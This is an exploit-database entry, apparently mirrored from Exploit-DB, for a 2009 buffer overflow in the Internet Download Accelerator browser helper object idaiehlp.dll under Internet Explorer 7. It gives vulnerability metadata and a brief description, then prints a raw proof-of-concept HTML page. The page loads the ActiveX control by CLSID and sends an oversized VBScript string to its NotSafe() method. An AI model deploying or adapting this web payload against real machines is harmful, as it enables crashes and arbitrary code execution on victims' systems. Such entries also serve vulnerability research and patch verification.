header-logo
Suggest Exploit
vendor:
Internet Download Accelerator
by:
eidelweiss
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Internet Download Accelerator
Affected Version From: 2.4.1.110
Affected Version To: 5.8.3.1221
Patch Exists: Yes
Related CWE: N/A
CPE: a:westbyte:internet_download_accelerator
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2
2009

Internet Explorer ver 7.0.5730.13 Buffer Overflow

This exploit is a buffer overflow vulnerability in the idaiehlp.dll BHO (Browser Helper Object) for Internet Download Accelerator. The vulnerability is triggered when a maliciously crafted argument is passed to the NotSafe() method of the idaiehlp.dll BHO. This can lead to arbitrary code execution on the vulnerable system.

Mitigation:

Upgrade to the latest version of Internet Download Accelerator.
Source

Exploit-DB raw data:

<!--========================== ==================================================
Internet Explorer ver 7.0.5730.13
Tested On Windows SP2
Inj3ct0r team & yogyacarderlink team
Bug discovered by eidelweiss
Affected Software: idaiehlp.dll  BHO: IE 4.x-6.x BHO for Internet Download Accelerator - {2A646672-9C3A-4C28-9A7A-1FB0F63F28B6}
DLL VER : 2.4.1.110
program ver : 5.8.3.1221
download link : http://download1.westbyte.com/ida/idasetup.exe
vendor www. westbyte.com
www.inj3ct0r.com
www.yogyacarderlink.web.id
==============================================================================-->
<html>
<object classid="clsid:2A646672-9C3A-4C28-9A7A-1FB0F63F28B6" id="idaiehlp"></object>
<script language='vbscript'>
arg1=String(9696969, "A") + String(999999, unescape("%960"))
idaiehlp.NotSafe (arg1)
</script>

Navigation

Suggest Exploit

Services By CQR